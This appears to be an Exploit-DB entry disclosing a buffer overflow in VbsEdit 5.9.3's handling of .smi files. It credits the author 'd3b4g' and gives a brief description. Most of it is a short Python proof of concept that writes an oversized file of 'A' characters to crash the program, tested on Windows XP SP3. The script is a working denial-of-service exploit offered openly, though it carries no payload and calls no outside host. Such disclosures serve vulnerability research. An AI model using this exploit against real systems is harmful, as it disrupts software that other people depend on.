VbsEdit 5.9.3 - .smi Buffer Overflow Vulnerability

2013-07-22T00:00:00
ID EDB-ID:27010
Type exploitdb
Reporter d3b4g
Modified 2013-07-22T00:00:00

Description

VbsEdit 5.9.3 - (.smi) Buffer Overflow Vulnerability. Dos exploit for windows platform

                                        
                                            # Exploit Title: VbsEdit 5.9.3(.smi file handling) Buffer overflow vulnerability
# Date: 22.7.2013
# Exploit Author: d3b4g
# Vendor Homepage:http://www.vbsedit.com/
# Software Link: http://www.vbsedit.com/
# Tested on: Windows XP SP3
# Twitter: @schaba



#!/usr/bin/python
# Tested on: win XPsp3
chars = "A"*90000
crush = "\x41\x41\x41\x41"
file=open('exp.smi','w')
file.write(chars+crush+chars)
file.close()